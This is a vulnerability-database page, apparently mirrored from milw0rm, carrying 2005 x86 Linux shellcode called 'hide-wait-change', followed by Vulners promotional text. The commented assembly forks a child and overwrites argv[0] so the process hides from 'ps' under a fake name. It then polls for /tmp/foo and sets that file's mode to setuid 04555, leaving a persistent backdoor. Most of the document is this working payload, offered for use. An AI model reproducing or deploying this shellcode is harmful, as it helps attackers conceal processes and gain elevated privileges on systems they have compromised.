Vulners
Lucene search
linux/x86 examples of long-term payloads hide-wait-change (.s)
#=============================================================================================#
# hide-wait-change (final v4) #
# ------------------------------------------------------------------------------------------- #
# Author: xort ([email protected]) #
# Date: 09/14/2005 3:35pm #
# Type: shellcode/(x86-linux).s, (at&t) #
# Size: strlen(fake-proc-name) + strlen(file-to-change) + 187 #
# Discription: This is a shellcode that will infect a process, play some argv[0] games among #
# other tricks to hide itself from 'ps', and waits until the creation of a #
# specified file. Once this file is found to exist, its permissions are changed #
# to 04555. Original concept concived by izik. #
###############################################################################################
.section .text
.global _start
###################################################################################
## ##
## _start: 1) fork() a new process ##
## 2) check to see if we are child process ##
## 3) if we are then _exit() ##
## ##
###################################################################################
_start:
#-------------------------------------------#
# we start with a fork() #
#-------------------------------------------#
push $0x02
pop %eax
int $0x80
#-------------------------------------------#
# child or parent? #
#-------------------------------------------#
test %eax, %eax
je proc_name
#-------------------------------------------#
# parent goes exit() #
#-------------------------------------------#
push $0x01
pop %eax
int $0x80
###################################################################################
## ##
## 1) get address of "/proc/self/stat" and fix null@end ##
## 2) open() "/proc/self/stat" ##
## 3) read in 250 bytes from file ##
## ##
###################################################################################
#-------------------------------------------#
# grab "/proc" string location #
#-------------------------------------------#
ret_w_proc: pop %ebx
lea 0x10(%ebx), %esi
#-------------------------------------------#
# fix "/proc" string to include c-string #
# terminator #
#-------------------------------------------#
incb 0xf(%ebx)
###################################################################################
## ##
## Open "/proc/self/stat" and read in 250 bytes ##
## ##
###################################################################################
#-------------------------------------------#
# open() the file #
#-------------------------------------------#
cdq
xor %ecx, %ecx
movb $0x5, %al
int $0x80
#------------------------------------------#
# read() 250-bytes from the file into #
# ESP-250 #
#------------------------------------------#
xchg %eax, %ebx # store fd-pointer in ebx
push $0x3
pop %eax
movb $250, %dl
mov %esp, %ecx
sub %edx, %ecx
int $0x80
mov %ecx, %edi
add %eax, %edi
###################################################################################
## ##
## 1) Get location of pointer to argv[0] from file (NF-13) ##
## 2) Convert it to binary ##
## 3) use that to find real argv[0]s location ##
## 4) null-out all args with 0x0 ##
## ##
###################################################################################
#------------------------------------------#
# scan for the decimal-string of the #
# location of argc & argv[0] #
#------------------------------------------#
xchg %eax, %ebx
std
push $0x20
pop %eax
push $14
pop %ecx
findargs:
xchg %ecx, %ebx
repne scasb
xchg %ecx, %ebx
loop findargs
inc %edi
inc %edi
#------------------------------------------#
# translate string into a real number to #
# obtain pointer. #
#------------------------------------------#
xor %eax, %eax
push $10
pop %ebx
cld
calcloop:
xor %edx, %edx
movb (%edi), %cl
subl $0x30, %ecx
addl %ecx, %eax
inc %edi
cmpb $0x20, (%edi)
je done_gotnum
mul %ebx
jmp calcloop
#------------------------------------------#
# once we have the location in memory of #
# pointers to argc,argv[0-?], and envp, #
# extract the location of argv[0] #
#------------------------------------------#
done_gotnum:
xchg %eax, %esp
pop %edi
pop %edi
xchg %eax, %esp
#------------------------------------------#
# write 255 null characters past argv[0] #
# to overwrite it and any other args so ps #
# wont see them later #
#------------------------------------------#
push %edi
movb $0xff, %cl
xor %eax, %eax
rep stosb
pop %edi
###################################################################################
## ##
## 1) Get location of string we are going to copy over argv[0] and fix ##
## null@end. ##
## 2) Call setsid() to extablish us as a process leader. ##
## 3) Jump over strings into shellcode. ##
## ##
###################################################################################
#------------------------------------------#
# Get string location, fix nullchar and #
# copy over argv[0], #
#------------------------------------------#
push %esi
dec %esi
findend:
inc %esi
inc %ecx
cmpb $0xff, (%esi)
jne findend
incb (%esi)
pop %esi
rep movsb
#------------------------------------------#
# Call setsid() to establish us as a #
# process leader. #
#------------------------------------------#
movb $66, %al
int $0x80
mov %esi, %edi
xchg %eax, %edx
dec %eax
mov %eax, %ecx
repne scasb
incb -1(%edi)
#------------------------------------------#
# Jump over strings into shellcode #
#------------------------------------------#
jmp *%edi
###################################################################################
## STRINGS ##
###################################################################################
proc_name:
call ret_w_proc
.ascii "/proc/self/stat\xff"
replace_string:
.ascii "haha\xff"
filename:
.ascii "/tmp/foo\xff"
###################################################################################
# #
# SHELLCODE #
# 1) call nanosleep(60) #
# 2) check to see if FILENAME exist w/ access() #
# 3) if it does, then chmod 04555 FILENAME and exit #
# 4) _exit() #
# #
###################################################################################
shellcode:
push $60
checkforfile:
inc %eax
#------------------------------------------#
# nanosleep(%edi) #
#------------------------------------------#
mov %esp, %ecx
mov %esp, %ecx
mov %esp, %ebx
xorb $0xa2, %al
int $0x80
#------------------------------------------#
# access((%esi),0) #
#------------------------------------------#
xor %ecx, %ecx
mov %esi, %ebx
xorb $0x21, %al
int $0x80
test %eax, %eax
jne checkforfile
#------------------------------------------#
# chmod((%esi),04555) #
#------------------------------------------#
movb $0xf, %al
movw $0x96d, %cx
int $0x80
#------------------------------------------#
# _exit() #
#------------------------------------------#
inc %eax
int $0x80
# milw0rm.com [2005-09-09]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Sep 2005 00:00Current
7.1High risk
Vulners AI Score7.1